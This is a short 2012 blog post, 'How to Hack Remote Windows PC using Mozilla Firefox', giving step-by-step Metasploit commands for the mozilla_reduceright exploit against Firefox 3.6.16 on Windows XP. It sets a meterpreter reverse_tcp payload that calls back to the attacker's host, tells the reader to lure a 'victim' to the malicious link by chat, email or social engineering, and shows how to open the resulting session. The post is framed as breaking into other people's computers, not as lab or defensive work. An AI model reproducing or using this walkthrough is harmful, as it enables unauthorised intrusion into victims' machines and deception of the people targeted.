Wednesday, October 24, 2012

How to Hack Remote Windows PC using Mozilla Firefox

This module exploits a vulnerability found in Mozilla Firefox 3.6. When an array object is configured with a large length value, the reduceRight() method may cause an invalid index being used, allowing abitrary remote code execution. Please note that the exploit requires a longer amount of time (compare to a typical browser exploit) in order to gain control of the machine
Exploit Targets
Mozilla Firefox 3.6.16
Windows XP SP 2
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/windows/browser/mozilla_reduceright
Msf exploit (mozilla_reduceright)>set payload windows/meterpreter/reverse_tcp
Msf exploit (mozilla_reduceright)>set lhost (IP of Local Host)
Msf exploit (mozilla_reduceright)>set srvhost (This must be an address on the local machine)
Msf exploit (mozilla_reduceright)>set uripath mozillanews (The Url to use for this exploit)
Msf exploit (mozilla_reduceright)>exploit
Now an URL you should give to your victim
Send the link of the server to the victim via chat or email or any social engineering technique.
Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

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